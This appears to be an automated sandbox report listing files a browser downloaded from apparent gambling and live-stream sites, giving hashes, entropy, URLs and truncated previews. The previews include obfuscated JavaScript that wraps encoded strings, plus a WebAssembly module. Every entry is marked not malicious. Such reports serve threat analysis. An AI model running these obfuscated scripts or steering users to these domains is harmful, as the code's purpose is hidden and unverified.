                                                                                                                                                          Preview:<!DOCTYPE html>..<html>....<head>.. <meta charset=utf-8>.. <meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no">.. <title></title>.. <style>.. .init-ip-block{position: fixed;top: 0;left: 0;background-color: #000;}#home-fake-app{width:100%;position:absolute;top:0;left:0;z-index:-1}body{margin: 0;padding: 0;}#error-main{position:absolute;top:0;bottom:0;left:0;font-size:14px;text-align:center;width:100%;height:100%;overflow:hidden;box-sizing:border-box;z-index:1000;background-color:#fff }#error-main .middle{position:absolute;width:100%;top:50%;left:0;transform:translateY(-50%) }.tips-img{width:150px;height:93px;margin:auto auto 5px;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAARcAAACtCAMAAACtK8tBAAAA8FBMVEUAAACwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCvr6+wsLCvr6+wsLCwsLCwsLCwsLCwsLCwsLCvr6+vr6+wsLCvr6+urq6wsLCurq6urq6wsLCvr6+wsLCwsLCurq6wsLCwsLCwsLCwsLCwsLCurq6urq6urq6wsLCwsLCwsLCwsLCvr6+wsLCwsLCpqamwsLCtra2pqamwsLCwsLCwsL
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):8317
                                                                                                                                                          Entropy (8bit):7.929703244013778
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:dFDbbvO7wihBUcwWtSU9Op5+EjuSGuW2/ODJQKDiQQCrgSqox4usFM7WtSEQxsN0:HoDwWtxxdQsiQQ0SwSMOJQU15Ejme
                                                                                                                                                          MD5:5EEFC611BE37986E64ADDE52AFB0B8DA
                                                                                                                                                          SHA1:45F17780A0D64418410A1C79FA6B271BBD0076AC
                                                                                                                                                          SHA-256:F8FF77CB2273F3CF608A7C9AEBC88ADEF700347073706F0DE473D8126446800A
                                                                                                                                                          SHA-512:257A751E343E70A63A4A32BD16287BF4DB9A9F0D4571AD0D7A63660A136E5982B37B2569B4217AD0029ED435A0F9A1FE36A3D9B5E136B297583803BB02EA068A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-b/fish_tp-3.png
                                                                                                                                                          Preview:.PNG........IHDR...<...<.....:..r....tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8" xmpMM:DocumentID="xmp.did:4F3CAC0189F711EAB484DB62618B7FF3" xmpMM:InstanceID="xmp.iid:4F3CAC0089F711EAB484DB62618B7FF3" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:be729f8c-7560-a744-bcd3-b1736b476fc8" stRef:documentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.=.m....IDATx..{y...y......../.bwq,
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (3496), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3496
                                                                                                                                                          Entropy (8bit):5.916580014587443
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:Vv875iNo6UgfgySU6ab8YjpBzFdhByBtdlQpDeB8yMkb:Vv872ojgfgFU6C8YjpBzFdktGahMkb
                                                                                                                                                          MD5:D052EC5C620206804FDD83CB1466A124
                                                                                                                                                          SHA1:78F7608265C6D6272367B2DADC86ECBD2E7CAFF4
                                                                                                                                                          SHA-256:AC72AA09B88727297882B4715F68598BB6798E68D0AD3BE1FCE439ED6576D5A4
                                                                                                                                                          SHA-512:FF66B38258996AE941A1068E53494FB3616A7C8ECE5B7DEBC168A5EB0E783749209C25E463505101F312972D97C727772292E1622742142C742B1748DE69FE7F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/msgBox.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAHAZgBYBdAGgG8AiQgagBEBPSgLgDMBXNGAFwEt1M3UiFJIAlFXZIQAAiTcATrx6UA3AHkwAKxA8AdABMQrXmhAAFBSgggF3BphGUA+s5BIAsigPsANiEoKADcoX3YQZgBCAAYAXzFVEIUZNABeJExKCAAxAE0Ac0oxUih0vTRMNGLedMy6A1xgItIUMoreYt9aygA5XIAPdWaYbrp2AHoAJmaFbuiYCFZmg1TMFEwxTHJY0k0dHkxfPQBbKAgPdm4oPnRxLeluDyR85hg9AHF4imgFaQBhOg9czXAAWbE4PH4FW4EgUIG47AUaBkCkMxigfm4egAqnwjj9/oDgdwQYIxDsDCg/r4UNJwVwbhUJCTeEg9A8nvktsdngBlEEoYBRACMpDQKAASiBjqYDMwWWzxVKZWgDKQefkAELeBjMNB+XxfBXlSXS2WpSLCnZXMD+ACCvl4+TQAAkoKr/Ap6ZCBBIACSZPQkkAAWhg6G4IDQ3CKehMqsyNv8se4KDtCgUUAcYjjKAUAFFYKSOAyoWTyEkZCBUgGYaJUiA9NdFJlQk60EVVJQYFHIwpKKl0gB+RswJAZSinBT5UyBSjRGQY1NFZiUfysGODpAjvRjidTmdoENKfIgmOkShLlArygns8D9IAMkfo/HmQPphD6/Pl8u1/J5KkLa7pwHaAAqUAvCWPrQrC8KIsiWJwhAviwCAmDjAAPFAMjjPkpAAOTYTIVzTvCqQuMBaBwJQMgEeSXzrJs2y7NoujcIcJxnO88J9nc2CTnyApNBeGpgbw3DJqJzzagYTDSfkdDXAECnUlA45zkgwkADLGNwPQgMASDaayP4QNY7A5KhhTEMU5D5PCnKybq0GMhsFZQMk3CpMaGrOaovCsJkKBsSog5QBsgggqyJwyTqYjPr5cVyXo/hoPkJIAHzRM+gg+dFbJ+Tq2BJVqOrZNZxC7hGvbFMafpmP
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4975
                                                                                                                                                          Entropy (8bit):7.857704680690562
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:dF5IhQA1MnPQ9GBWdKqeiVKHMJkP1U2UbBJuET5b1VDkH9Fv:G1YSVcpUbjT5BRkdFv
                                                                                                                                                          MD5:692908678ABE41B359A556B5EACBEAB0
                                                                                                                                                          SHA1:4004F1ECEA6DDB603E4E706C89F4426A8C10ADD6
                                                                                                                                                          SHA-256:E74332A3C8A6E0E9839AA1350A2093A2EE850F1D9F1844D58DEDC6B13A986A4A
                                                                                                                                                          SHA-512:396567182016501BE6F0F10F0C31290574E9DCCE55021FC7117408EE74F87BA46EF7E0491703EC752F4A637898A9CD9D851EA27E5F36B61DC6B8ECC456F5F0F0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-b/game_tp.png
                                                                                                                                                          Preview:.PNG........IHDR...<...<.....:..r....tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8" xmpMM:DocumentID="xmp.did:64E8B6CB89F011EAAA3187E8B31DCDC2" xmpMM:InstanceID="xmp.iid:64E8B6CA89F011EAAA3187E8B31DCDC2" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:44a76a31-a741-df47-be85-17dd3e48eedf" stRef:documentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>^......IDATx..[{.\W}..}.s........I
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3277
                                                                                                                                                          Entropy (8bit):7.68223520405088
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:bccinNuitNFBNeeJ3mQWQ/IW814bOLgAuWahQEGO8YUaDV2E1D3BDhY3g4UZ35MS:4NNW8IR25WKQ5O8YUO22YvS
                                                                                                                                                          MD5:01494C55C9EB698D63A918F634F4F040
                                                                                                                                                          SHA1:FA29AF59187E300D3CB0850B6461C65C777CBD30
                                                                                                                                                          SHA-256:101E350D2DA926DCAFE843885FE34A77946D1E8A20FE1C64DA8692A22AD32B6A
                                                                                                                                                          SHA-512:CF287AB75A71A29BFC9D6E955C3BE308E66B2B31E1B84A24CD01E2F9A39A4B974F1C69E86E7205311FE0B8F4892730B81D923EABCA2A1B687E4F596DC662C3C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/live_og.png
                                                                                                                                                          Preview:.PNG........IHDR.............L7.4....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:17BBB51BCE49E711A809823CCFAF5CCB" xmpMM:DocumentID="xmp.did:5A43B85B211611E8A37FCD2FD4B0745A" xmpMM:InstanceID="xmp.iid:5A43B85A211611E8A37FCD2FD4B0745A" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8A809D57F77611E7B91CA8896BA0A9B2" stRef:documentID="xmp.did:8A809D58F77611E7B91CA8896BA0A9B2"/> </rdf:Description> </rdf:RDF> </x:xmpme
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1876
                                                                                                                                                          Entropy (8bit):7.365132072142541
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:iONn2t0sJ3l1Vc9BqsJFX18OJRiidZm0B6:p2LM9BqsdjJRBB6
                                                                                                                                                          MD5:E2DC1E38E5C072C18E880101A864E29D
                                                                                                                                                          SHA1:C8BF24681F5B50CC590B4EE2041C85C4C9591453
                                                                                                                                                          SHA-256:76176A5EBB5144DA81F1496E8F0DC9DF30B8E869CF7CECCC7C1B401B07190FD5
                                                                                                                                                          SHA-512:CD227FA04F811C4AF0CD9E747C70F2DE9BB2207F77C3F6A3D8CA3CB1385B86566162C3313E83572731DA777901FA5079AAACF82EB04F23501722FFFD0302F524
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/live_sexy_w.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<...#iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.2 (Windows)" xmpMM:InstanceID="xmp.iid:78FE3E11020511EBBC4CCADF41D5C8E4" xmpMM:DocumentID="xmp.did:78FE3E12020511EBBC4CCADF41D5C8E4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:78FE3E0F020511EBBC4CCADF41D5C8E4" stRef:documentID="xmp.did:78FE3E10020511EBBC4CCADF41D5C8E4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..~D....IDATx..mhSW..'.7.5)}."N...5h?X.SJ.n...fM....W|/.8.X.!.... ..D.cS...D..h..|...Zk[D|i...mr...^n5..C."...qn..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 11 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1205
                                                                                                                                                          Entropy (8bit):6.647003496408082
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:RhY1hfvWwjx82lY2T3JVbG/oyJ3Vb5TGmPiSxRW2Hr:DWANn2NgrJ3HriSv1r
                                                                                                                                                          MD5:C1EBFF4C49FB0032D2EB0034053FD92E
                                                                                                                                                          SHA1:9B84DB8909221522C8078FC94E112A575A9037A0
                                                                                                                                                          SHA-256:B46BA1D2208BC195218161642DA8FC5DA46B17F48EE7B89482DBE2589C7A7DC6
                                                                                                                                                          SHA-512:6EC5CAFE4997B61DAC8A4B80AF661AF2B1FCE1C65006E63687D36C48030120B8093A78E538021414BD6EB454FA5F756287DBE885CC39CF8077834EC12984F8A4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR..............a.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:8D7AEBD350A211E7A6B9B6765F8E393D" xmpMM:DocumentID="xmp.did:8D7AEBD450A211E7A6B9B6765F8E393D"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8D7AEBD150A211E7A6B9B6765F8E393D" stRef:documentID="xmp.did:8D7AEBD250A211E7A6B9B6765F8E393D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..=....%IDATx.L.O+DQ...3W..DSJ,.I...o@....Db...X(.e.....)!..*..j..(..R6B...G..9...y~...n.x.h...:.MX.....1.1..T.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1203
                                                                                                                                                          Entropy (8bit):7.6423370091541045
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:0q2UxzC7yqsfRY5+zg95emDCzEvk8tHqZRbfZoJ2HPt5gTT4tBOhAMe6:0qboyqsfO5+8MA+EvDpqzfXH7g64eN6
                                                                                                                                                          MD5:375073F4229C808F4EC35542748EBA24
                                                                                                                                                          SHA1:A3442405D67BDBEBA808F0433C0F46CCA4C2E1D6
                                                                                                                                                          SHA-256:9CBBBF9B8DF0CA98E9E236C87E9D456B6B1444E85D0E90DAA060164374ECBAE3
                                                                                                                                                          SHA-512:1D978648E31DEC62E03FEE6EA377AD16288CE6B1A5E2D3828D44A920C6028733E8428B7FC8E1A5BD93584F563763B0AD7B43E8A3540091A7F91DEB55097E2AA4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/card_yg.png
                                                                                                                                                          Preview:.PNG........IHDR...............^.....PLTE....!B."C. A.$E."C."C.#D.$D."C.!B.$F."C."D.!C.#D."C.#D.$E."C.%F.#D.!C."C.!B.#D.!B.#C."C.$E.#C.!B.$E.#D."C.!B."C. A.!B.&G.$E./N.%F.!B./N.-L."C.!B.!B.#D.%F.$E.'H.3S$8V.)J.)J.0P.*J.'G...y..Os.M^vHXq*B_.?\+=Z.8Z.;X":X.7X.6W.7V.4R.$R.2Q 2P./N..N.,L.(H...W........e..u..e..Dw.P}.6u.[x.b..az.^|./l.7p.Dn.=r.^v.1e.9j.;o.Gc.Sn.'a.1a}Mc{"Ty*Yx5Yu<ZtAVp2Rp7Pj$If"Cc.Fb*@]&<Z.4S.(O./N.%F......................u..N.....`..|..{..I..g..^..?..r..i..q.....B{.m..F..m..Q|.l..Z..J..<w.7n.t..i|.Lk.)h.Lq.Mq.Bo.@f.+f.Xn.Oj.@`.?a~Ud{1Wz/Wr%Qq>To,So-Sm=Oj$Hd1Gb&Da.Ba.Ba$@]..W..T...0tRNS.........R.....7.z.........~tqk_XMEA?3+.....W++..R.....IDAT(....@.Eg.......Hf;13-333.......".S.V..=....Vu_..I..FT..f1L...3"i.V..Y..%.-....iI...qS$..V.;P.!G..X.M+.S.v'.).(M.-L....&q..=K....}...M-L. ..C:.R$.v...<......yh..H..P.........{.X.YHL...............O..MU.9.kg!$....$J....+.3mu...+u6?....1.Y... 2.t......m..s$.[...n.)@!!..LV...........4...dX... ../v....^......o..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (4224), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4224
                                                                                                                                                          Entropy (8bit):5.898011229115903
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:VGSJDCtgIULf/1DdN+MZ6P3rS52uUsnRrMqq1puwWklB0nl:VjJDfn/1DT+MoTS5lUsR4qqPuPk/0nl
                                                                                                                                                          MD5:87C084E75B2FF5E2E64F9890DD4ED0A1
                                                                                                                                                          SHA1:9B34FCDDADC2839ACC133FC0FCE50EEEF07B7A68
                                                                                                                                                          SHA-256:08C7633D4DEE1A0FE88A7A639721F35E98CC6D6CAC312CF87A757E289334AE55
                                                                                                                                                          SHA-512:36BBC7A68A44FA6D71F298A348D17522E67DA697127FDACD7D36887AE3CFE07221BEB434AD41FA39E4E2D4C2B700561EF5490D4FB0AD37BF3308B4CFC26174EF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/382/footerNav.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAHANgHYBdAGgG8ARAGQBsBzALgDMBXNGAFwEt1MlSnAJTkAvqQAKAD2oAmFuy680/QaSgiARKyQgABEk4Anbl00BuAPJgAViC4A6ACYhm3NCAlGUEEEc4AnpicpJoA+mEgSACyKE6stCCaFABuULSsIIwAhAAMokLmaUZ6rAC8UJiauTAQzJpCpCll5E5QnFAKHDx8IkYgnKxGaORoUCmM2GQwTmgS7QAWjKzOrlAJnA4AwuiGUGibM2gAEiiGpN6snH6Mmu7MKEYAtu3KAPyaouJPAwtxSIwxKQYP12iAnF0lL1yMUDGVOAtuAJOGVgO4nChgA4AMoAaQAkgA5cyVTQpegLSwNKoOAD0mgA1JwGZpaUhWGBCeMHDYkA0HAiQCo2N1lJhWCJYc0Vj80KxqEjOCSqgBGACCNno1M0dMZzNZ6JAUh5fKEAoWQswIqhKmEMKgJSg8IcDxQ1yMDjGKXMSAcABIPFJOAAVUxwK2KHoqES+r0VBwvLDWqP8PoDIZoAwOWiKhNQJORsVIGMOaAIgBk5dZmmyZV9ZYWDnZYEMRkwuVIKqElf4DgWUCQlmAc28vn8QU0Yx+DUrmhrdc9UB+AB9l72pyAyilsPXFsQHDAFo1dwiyqynDA3twnGeGSejwVSEgCi+hC/SE8UOxrhDk2KRF8pBgC0/RoC4RiQimkoOnCCJIoIC5+iCIBggAooksohE6vphLotDMA4YQwKuSr9IMwx6KSTjcCkyTkHsPAwFstADgCmiuu6AC0XqfKQ2AqmUgmxtyiRoPQCJvDuhG0Ou4ykH+fB2mRGZSWEMmbDm5wKbaabkWg2BUTRyTYJsDZvKSlxcTmaBwHRMAsUgAKHCxABeLnqJwxgAuQnAoIwpmLIBqkpFUAA6mZ6JFUXRXojI4UgwSLj8QgsuFMUxQ0xBCIwpJQHZDlOQernue0XmAgs/TMP5faVaumg2OM
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):17264
                                                                                                                                                          Entropy (8bit):7.957851912730042
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:Bd/F5IhIlqmVUgkOduOyX2sjzELCfBhC6DvFSi9q:B70IImVUvOduOyGsikhC6DvFE
                                                                                                                                                          MD5:CF4793E4F829969195CB58EFFDFFCC3C
                                                                                                                                                          SHA1:73EA126C25F1EC7E02A3216AFBDC68204EDC18BB
                                                                                                                                                          SHA-256:1E91C94ABA2BC799802FCB49FEE566D9095FE76D2C2EEBE7E876E06E50DD6E00
                                                                                                                                                          SHA-512:6C837B9092076E7DA94E8305573C76631CA9402B2E903D6B9EF10EB18585D874B1F29F2D2267D34DCCE18AEAE0172A3E0023354C01EF7A44827EA09A264B8D84
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/gd_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BF908D248D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BF908D238D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 32727
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5207
                                                                                                                                                          Entropy (8bit):7.960518809198506
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:pLzZOKTXT9atAFsvyIV/PicwofN6DDfO8F5HQ9DrioRUUwzwvBMQj1aSejt:lZROAFCV/Pd6PfZChUUwzwvBMQteh
                                                                                                                                                          MD5:3BDCFF823CEE54E2337932CB9D306566
                                                                                                                                                          SHA1:436AB9AE33ED90D9A1FE087E25540C7DC381589A
                                                                                                                                                          SHA-256:080D1C38ED29B8790CD5831C14FD5431FBB7650721CEDA323F9B8C467E8D60A9
                                                                                                                                                          SHA-512:BD360C5004CEB422CADD4A4834CCBA96A98DEDD997DBADFDC1F3851BD8271957DD7B56E473E32FEE4231D582A8B66167F562091E61DE260553BB9E7CF5108A33
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/061410/rcenter/common/static/js/gb.validation.min.js?v=1716975949157
                                                                                                                                                          Preview:...........=k...q..+F...}."wy..".6b.)$6H.0..7...ff.w'..'_l..$!......N..0. A...c...O.......LwO....5,.n...........9]......9.8...u...<y......w.6I..E-...{.D.dA..ZB=.4!So5Ob..5...d.lu...p....F&.\....iL...W.~..I.39[.=?.`...p..?....?...?....../?...,.O....xL........g._nw...../......:."2.H|.D*...g..W%e...{.L............0.'..$9.@...3....v...n....r..y8~T.[...Ek....xN..M.../."58.&.7(..?..b...].?!..*.I..cr.."..>g..*0f...2~.&.K.>.`$..$....>...p.-qc.{.,!.....p...#.O.[Fa...6.....;...w5......7....-...q./VH........~.'q.E(=..q89...Ir.H...$.(p..<&.....M]......p. K..9Mw..b.>&..|N..:S...$<..m.J...Y..C.Jl......$Y.a.`^V.........z3..l#,2.........$\.O(CVS.c.P)cS.....$<.6.n..&.{...... H.G..m.`.u...h$t$ .$.j.(..#..X-7...6...n..^].!......?.@......W8..P6.u..J....*?..........2........T.v..4.(..............8".,9y.Dc..6.^..o.I3Oo.t.#.....nBwgU#...ET..nv...l9....EGL.j...x.....}gK'B....4nO...x...........p....o.89..}....59...PF......!u#...l/@........i.M.F[.>S
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/cc.png?r=8877277658
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:WebAssembly (wasm) binary module version 0x1 (MVP)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):108015
                                                                                                                                                          Entropy (8bit):6.099067518890094
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:uaglDavyQEyIWLcb/+W+2CJr71V+F3pdMBFf/kqjYf2FvZ/DKj8m9S4Aww0EEY:XlJM+W+2CJrs3pdOrkfkv0j8N2wEY
                                                                                                                                                          MD5:3875C16DCC2FC3155E37F22AA92632D0
                                                                                                                                                          SHA1:25D140EF2CF2AB3C6C9F656D2BE3C756068D5E0E
                                                                                                                                                          SHA-256:F682A144DBA0F29228190EEAAC8014C502C7539949128E9A5C8986BBEBAD8EE6
                                                                                                                                                          SHA-512:B946D8F48D3789B07E21E0EF5A761615E78F134277387E454160FA4C74EC04378DE5A5C44C459EF05C9FEFE4DF272AAB22ED3FAD259EA2D962F2E19AE77C1A19
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://stt-wasm.ai4funs.com/mimlib.wasm
